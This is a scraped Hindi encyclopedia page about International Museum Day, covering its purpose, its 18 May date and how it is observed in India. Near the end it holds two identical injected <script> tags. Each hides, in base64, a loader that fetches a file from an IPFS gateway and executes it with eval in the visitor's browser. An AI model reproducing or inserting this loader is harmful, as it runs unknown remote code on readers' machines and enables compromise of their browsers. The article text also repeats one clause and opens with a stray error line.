एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "०"।

अंतरराष्ट्रीय संग्रहालय दिवस

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

अंतरराष्ट्रीय संग्रहालय दिवस का उद्देश्य विकासशील समाज में संग्रहालयों की भूमिका के प्रति जन-जागरूकता को बढ़ाना है और यह कार्यक्रम विश्व में 1977 से मनाया जा रहा है। अंतरराष्ट्रीय संग्रहालय परिषद 1992 से प्रत्येक वर्ष एक विषय का चयन करता है एवं जनसामान्य को संग्रहालय विशेषज्ञों से मिलाने एवं संग्रहालय की चुनौतियों से अवगत कराने के जनसामान्य को संग्रहालय विशेषज्ञों से मिलाने एवं संग्रहालय की चुनौतियों से अवगत कराने के लिए स्रोत सामग्री विकसित करता है। वर्ष 2012 का विषय ‘बदलती दुनिया में संग्रहालय: नई चुनौतियाँ, नई प्रेरणाएँ’ है।

अनमोल यादों का संग्रह

संग्रहालय में हमारे पूर्वजों की अनमोल यादों को संजोकर रखा जाता है। किताबें, पाण्डुलिपियां, रत्न, चित्र, शिला चित्र और अन्य सामानों के रुप में तमाम तरह की वस्तुएं संग्रहालयों में हमारे पूर्वजों की यादों को जिंदा रखी हुई हैं। हर देश की संस्कृति को समझने में कई वस्तुएं विशेष योगदान निभाती हैं जिन्हें संग्रहालयों में ज़िंदा रखा जाता है।

18 मई (अंतरराष्ट्रीय संग्रहालय दिवस)

संग्रहालयों की विशेषता और उनके महत्व को समझते हुए संयुक्त राष्ट्र ने 1983 में 18 मई को विश्व संग्रहालय दिवस के रुप में मनाने का निर्णय किया। इसका उद्देश्य आम जनता में संग्रहालयों के प्रति जागरुकता फैलाना और उन्हें संग्रहालयों में जाकर अपने इतिहास को जानने के प्रति जागरुक बनाना है। यह दिवस विश्वभर में विकास में संग्रहालयों की भूमिका के बारे में लोगों में जागरूकता पैदा करने के लिए प्रतिवर्ष मनाया जाता है। अंतरराष्ट्रीय संग्रहालय परिषद कहा कि संग्रहालय में ऐसी अनेक चीज़ें सुरक्षित रखी जाती हैं जो मानव सभ्यता की याद दिलाती हैं। संग्रहालयों में रखी गई वस्तुएं प्रकृति और सांस्कृतिक धरोहरों को प्रदर्शित करती हैं।

भारत में भी विश्व संग्रहालय दिवस पर तमाम तरह के कार्यक्रम आयोजित किए जाते हैं। इन कार्यक्रमों का मुख्य उद्देश्य आम जनता, छात्रों एवं शोधार्थियों को विभिन्न संग्रहालयों में उपलब्ध समृद्ध सांस्कृतिक विरासत की जानकारी देना है। आज के दिन भारत सरकार के सभी संग्रहालयों में प्रवेश निःशुल्क कर दिया जाता हैं। भारतीय पुरातत्व सर्वेक्षण ने वर्ष 2011 के अंतरराष्ट्रीय संग्रहालय दिवस (Archaeological Survey of India) का विषय संग्रहालय और स्मृति (Museum and Memory) निर्धारित किया। भारतीय पुरातत्व सर्वेक्षण विभाग के तहत देश में 40 से अधिक संग्रहालय हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>